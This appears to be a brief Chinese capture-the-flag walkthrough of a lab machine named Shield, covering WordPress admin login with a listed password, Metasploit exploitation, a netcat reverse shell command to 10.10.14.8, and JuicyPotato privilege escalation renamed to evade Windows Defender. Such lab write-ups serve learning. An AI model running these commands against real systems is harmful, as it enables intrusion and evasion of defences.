文章目录
- Shield
Shield
扫描文件
神奇的出来个这个
扫描发现存在wordpress站点
用admin/P@s5w0rd!
成功登陆后台
发现存在漏洞的
后面发现可以直接用msf来利用,完美的
换个目录方便我上传文件
接下来cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
刚刚发现文件放错地方了重新来一下
执行execute -f nc.exe -a "-e cmd.exe 10.10.14.8 1234"
成功接收到shell
接下来上传upload JuicyPotato.exe
,利用MS16-075提权,网上wp说防止被windows defender拿下
mv JuicyPotato.exe js.exe
接下来机器开启nc监听等待提权返回
成功提权